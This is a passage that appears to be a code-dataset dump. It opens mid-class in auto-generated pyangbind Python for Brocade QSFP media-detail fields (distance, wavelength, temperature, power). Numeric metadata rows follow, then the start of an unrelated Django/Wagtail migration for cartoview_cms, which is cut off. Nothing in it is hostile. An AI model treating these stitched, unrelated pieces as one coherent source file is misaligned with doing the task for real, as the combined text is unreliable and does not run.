t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'short-dist': {'value': 1}, u'unknown': {'value': 4}, u'long-dist': {'value': 3}, u'inter-dist': {'value': 2}},), is_leaf=True, yang_name="distance", rest_name="distance", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """distance must be of a type compatible with enumeration""",
'defined-type': "brocade-interface-ext:enumeration",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'short-dist': {'value': 1}, u'unknown': {'value': 4}, u'long-dist': {'value': 3}, u'inter-dist': {'value': 2}},), is_leaf=True, yang_name="distance", rest_name="distance", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)""",
})
self.__distance = t
if hasattr(self, '_set'):
self._set()
def _unset_distance(self):
self.__distance = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'short-dist': {'value': 1}, u'unknown': {'value': 4}, u'long-dist': {'value': 3}, u'inter-dist': {'value': 2}},), is_leaf=True, yang_name="distance", rest_name="distance", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
def _get_media_form_factor(self):
"""
Getter method for media_form_factor, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/media_form_factor (enumeration)
"""
return self.__media_form_factor
def _set_media_form_factor(self, v, load=False):
"""
Setter method for media_form_factor, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/media_form_factor (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_media_form_factor is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_media_form_factor() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'tv': {'value': 5}, u'tw': {'value': 8}, u'mi': {'value': 6}, u'tp': {'value': 7}, u'm5': {'value': 3}, u'm6': {'value': 4}, u'sm': {'value': 1}, u'unknown': {'value': 9}, u'mx': {'value': 2}},), is_leaf=True, yang_name="media-form-factor", rest_name="media-form-factor", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """media_form_factor must be of a type compatible with enumeration""",
'defined-type': "brocade-interface-ext:enumeration",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'tv': {'value': 5}, u'tw': {'value': 8}, u'mi': {'value': 6}, u'tp': {'value': 7}, u'm5': {'value': 3}, u'm6': {'value': 4}, u'sm': {'value': 1}, u'unknown': {'value': 9}, u'mx': {'value': 2}},), is_leaf=True, yang_name="media-form-factor", rest_name="media-form-factor", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)""",
})
self.__media_form_factor = t
if hasattr(self, '_set'):
self._set()
def _unset_media_form_factor(self):
self.__media_form_factor = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'tv': {'value': 5}, u'tw': {'value': 8}, u'mi': {'value': 6}, u'tp': {'value': 7}, u'm5': {'value': 3}, u'm6': {'value': 4}, u'sm': {'value': 1}, u'unknown': {'value': 9}, u'mx': {'value': 2}},), is_leaf=True, yang_name="media-form-factor", rest_name="media-form-factor", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
def _get_wavelength(self):
"""
Getter method for wavelength, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/wavelength (string)
YANG Description: Wavelength of pluggable media
"""
return self.__wavelength
def _set_wavelength(self, v, load=False):
"""
Setter method for wavelength, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/wavelength (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_wavelength is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_wavelength() directly.
YANG Description: Wavelength of pluggable media
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="wavelength", rest_name="wavelength", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """wavelength must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="wavelength", rest_name="wavelength", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
})
self.__wavelength = t
if hasattr(self, '_set'):
self._set()
def _unset_wavelength(self):
self.__wavelength = YANGDynClass(base=unicode, is_leaf=True, yang_name="wavelength", rest_name="wavelength", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
def _get_serial_no(self):
"""
Getter method for serial_no, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/serial_no (string)
YANG Description: This indicates the Serial number.
"""
return self.__serial_no
def _set_serial_no(self, v, load=False):
"""
Setter method for serial_no, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/serial_no (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_serial_no is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_serial_no() directly.
YANG Description: This indicates the Serial number.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="serial-no", rest_name="serial-no", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """serial_no must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="serial-no", rest_name="serial-no", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
})
self.__serial_no = t
if hasattr(self, '_set'):
self._set()
def _unset_serial_no(self):
self.__serial_no = YANGDynClass(base=unicode, is_leaf=True, yang_name="serial-no", rest_name="serial-no", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
def _get_date_code(self):
"""
Getter method for date_code, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/date_code (string)
YANG Description: This indicates the Vendor's
manufactoring date code.
"""
return self.__date_code
def _set_date_code(self, v, load=False):
"""
Setter method for date_code, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/date_code (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_date_code is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_date_code() directly.
YANG Description: This indicates the Vendor's
manufactoring date code.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="date-code", rest_name="date-code", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """date_code must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="date-code", rest_name="date-code", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
})
self.__date_code = t
if hasattr(self, '_set'):
self._set()
def _unset_date_code(self):
self.__date_code = YANGDynClass(base=unicode, is_leaf=True, yang_name="date-code", rest_name="date-code", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
def _get_temperature(self):
"""
Getter method for temperature, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/temperature (uint32)
YANG Description: This indicates the Module
temperature (degrees C)
"""
return self.__temperature
def _set_temperature(self, v, load=False):
"""
Setter method for temperature, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/temperature (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_temperature is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_temperature() directly.
YANG Description: This indicates the Module
temperature (degrees C)
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="temperature", rest_name="temperature", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """temperature must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="temperature", rest_name="temperature", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='uint32', is_config=True)""",
})
self.__temperature = t
if hasattr(self, '_set'):
self._set()
def _unset_temperature(self):
self.__temperature = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="temperature", rest_name="temperature", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='uint32', is_config=True)
def _get_voltage(self):
"""
Getter method for voltage, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/voltage (decimal64)
YANG Description: This indicates the Supply voltage
(Volts)
"""
return self.__voltage
def _set_voltage(self, v, load=False):
"""
Setter method for voltage, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/voltage (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_voltage is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_voltage() directly.
YANG Description: This indicates the Supply voltage
(Volts)
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="voltage", rest_name="voltage", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """voltage must be of a type compatible with decimal64""",
'defined-type': "decimal64",
'generated-type': """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="voltage", rest_name="voltage", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)""",
})
self.__voltage = t
if hasattr(self, '_set'):
self._set()
def _unset_voltage(self):
self.__voltage = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="voltage", rest_name="voltage", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
def _get_current(self):
"""
Getter method for current, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/current (decimal64)
YANG Description: This indicates the Laser diode
drive current (milliAmps)
"""
return self.__current
def _set_current(self, v, load=False):
"""
Setter method for current, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/current (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_current is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_current() directly.
YANG Description: This indicates the Laser diode
drive current (milliAmps)
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedPrecisionDecimalType(precision=3), is_leaf=True, yang_name="current", rest_name="current", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """current must be of a type compatible with decimal64""",
'defined-type': "decimal64",
'generated-type': """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=3), is_leaf=True, yang_name="current", rest_name="current", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)""",
})
self.__current = t
if hasattr(self, '_set'):
self._set()
def _unset_current(self):
self.__current = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=3), is_leaf=True, yang_name="current", rest_name="current", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
def _get_tx_power(self):
"""
Getter method for tx_power, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/tx_power (decimal64)
YANG Description: This indicates the Transmitted
optical power (microWatts)
"""
return self.__tx_power
def _set_tx_power(self, v, load=False):
"""
Setter method for tx_power, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/tx_power (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_tx_power is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tx_power() directly.
YANG Description: This indicates the Transmitted
optical power (microWatts)
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="tx-power", rest_name="tx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tx_power must be of a type compatible with decimal64""",
'defined-type': "decimal64",
'generated-type': """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="tx-power", rest_name="tx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)""",
})
self.__tx_power = t
if hasattr(self, '_set'):
self._set()
def _unset_tx_power(self):
self.__tx_power = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="tx-power", rest_name="tx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
def _get_rx_power(self):
"""
Getter method for rx_power, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/rx_power (decimal64)
YANG Description: This indicates the Received
optical power (microWatts)
"""
return self.__rx_power
def _set_rx_power(self, v, load=False):
"""
Setter method for rx_power, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/rx_power (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_rx_power is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_rx_power() directly.
YANG Description: This indicates the Received
optical power (microWatts)
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="rx-power", rest_name="rx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """rx_power must be of a type compatible with decimal64""",
'defined-type': "decimal64",
'generated-type': """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="rx-power", rest_name="rx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)""",
})
self.__rx_power = t
if hasattr(self, '_set'):
self._set()
def _unset_rx_power(self):
self.__rx_power = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="rx-power", rest_name="rx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
speed = __builtin__.property(_get_speed, _set_speed)
connector = __builtin__.property(_get_connector, _set_connector)
encoding = __builtin__.property(_get_encoding, _set_encoding)
vendor_name = __builtin__.property(_get_vendor_name, _set_vendor_name)
vendor_oui = __builtin__.property(_get_vendor_oui, _set_vendor_oui)
vendor_pn = __builtin__.property(_get_vendor_pn, _set_vendor_pn)
vendor_rev = __builtin__.property(_get_vendor_rev, _set_vendor_rev)
distance = __builtin__.property(_get_distance, _set_distance)
media_form_factor = __builtin__.property(_get_media_form_factor, _set_media_form_factor)
wavelength = __builtin__.property(_get_wavelength, _set_wavelength)
serial_no = __builtin__.property(_get_serial_no, _set_serial_no)
date_code = __builtin__.property(_get_date_code, _set_date_code)
temperature = __builtin__.property(_get_temperature, _set_temperature)
voltage = __builtin__.property(_get_voltage, _set_voltage)
current = __builtin__.property(_get_current, _set_current)
tx_power = __builtin__.property(_get_tx_power, _set_tx_power)
rx_power = __builtin__.property(_get_rx_power, _set_rx_power)
__choices__ = {u'interface-identifier': {u'qsfp': [u'speed', u'connector', u'encoding', u'vendor_name', u'vendor_oui', u'vendor_pn', u'vendor_rev', u'distance', u'media_form_factor', u'wavelength', u'serial_no', u'date_code', u'temperature', u'voltage', u'current', u'tx_power', u'rx_power']}}
_pyangbind_elements = {'speed': speed, 'connector': connector, 'encoding': encoding, 'vendor_name': vendor_name, 'vendor_oui': vendor_oui, 'vendor_pn': vendor_pn, 'vendor_rev': vendor_rev, 'distance': distance, 'media_form_factor': media_form_factor, 'wavelength': wavelength, 'serial_no': serial_no, 'date_code': date_code, 'temperature': temperature, 'voltage': voltage, 'current': current, 'tx_power': tx_power, 'rx_power': rx_power, }
| 79.844532
| 1,069
| 0.711759
| 8,154
| 60,602
| 5.060829
| 0.036546
| 0.069016
| 0.081956
| 0.041802
| 0.899651
| 0.886493
| 0.879804
| 0.865361
| 0.859836
| 0.837057
| 0
| 0.010818
| 0.142735
| 60,602
| 758
| 1,070
| 79.949868
| 0.783492
| 0.187898
| 0
| 0.501222
| 0
| 0.041565
| 0.394032
| 0.183989
| 0
| 0
| 0
| 0
| 0
| 1
| 0.132029
| false
| 0
| 0.01956
| 0
| 0.264059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b19b3cf30b24b17da3c6afb7acbea4da8e99dd8
| 157,223
|
py
|
Python
|
migrations/0010_auto_20220602_0753.py
|
cartologic/cartoview_cms
|
3f21a092c90db3d4560d69c1c2a6c7843b23ea0e
|
[
"BSD-2-Clause"
] | null | null | null |
migrations/0010_auto_20220602_0753.py
|
cartologic/cartoview_cms
|
3f21a092c90db3d4560d69c1c2a6c7843b23ea0e
|
[
"BSD-2-Clause"
] | null | null | null |
migrations/0010_auto_20220602_0753.py
|
cartologic/cartoview_cms
|
3f21a092c90db3d4560d69c1c2a6c7843b23ea0e
|
[
"BSD-2-Clause"
] | null | null | null |
# Generated by Django 2.2.24 on 2022-06-02 07:53
import cartoview_cms.models.streamfields.Blocks
import coderedcms.blocks.base_blocks
import coderedcms.blocks.html_blocks
from django.db import migrations
import wagtail.contrib.table_block.blocks
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.embeds.blocks
import wagtail.images.blocks
import wagtail.snippets.blocks
class Migration(migrations.Migration):
dependencies = [
('cartoview_cms', '0009_auto_20220526_1228'),
]
operations = [
migrations.AlterField(
model_name='genericmodule',
name='body',
field=wagtail.core.fields.StreamField([('hero', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(default=True, label='Full width', required=False)), ('is_parallax', wagtail.core.blocks.BooleanBlock(help_text='Background images scroll slower than foreground images, creating an illusion of depth.', label='Parallax Effect', required=False)), ('background_image', wagtail.images.blocks.ImageChooserBlock(required=False)), ('tile_image', wagtail.core.blocks.BooleanBlock(default=False, label='Tile background image', required=False)), ('background_color', wagtail.core.blocks.CharBlock(help_text='Hexadecimal, rgba, or CSS color notation (e.g. #ff0011)', label='Background color', max_length=255, required=False)), ('foreground_color', wagtail.core.blocks.CharBlock(help_text='Hexadecimal, rgba, or CSS color notation (e.g. #ff0011)', label='Text color', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('row', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('column_breakpoint', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Always expanded'), ('sm', 'sm - Expand on small screens (phone, 576px) and larger'), ('md', 'md - Expand on medium screens (tablet, 768px) and larger'), ('lg', 'lg - Expand on large screens (laptop, 992px) and larger'), ('xl', 'xl - Expand on extra large screens (wide monitor, 1200px)')], help_text='Screen size at which the column will expand horizontally or stack vertically.', required=False, verbose_name='Column Breakpoint'))])), ('column_size', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Automatically size'), ('12', 'Full row'), ('6', 'Half - 1/2 column'), ('4', 'Thirds - 1/3 column'), ('8', 'Thirds - 2/3 column'), ('3', 'Quarters - 1/4 column'), ('9', 'Quarters - 3/4 column'), ('2', 'Sixths - 1/6 column'), ('10', 'Sixths - 5/6 column'), ('1', 'Twelfths - 1/12 column'), ('5', 'Twelfths - 5/12 column'), ('7', 'Twelfths - 7/12 column'), ('11', 'Twelfths - 11/12 column')], label='Column size', required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', 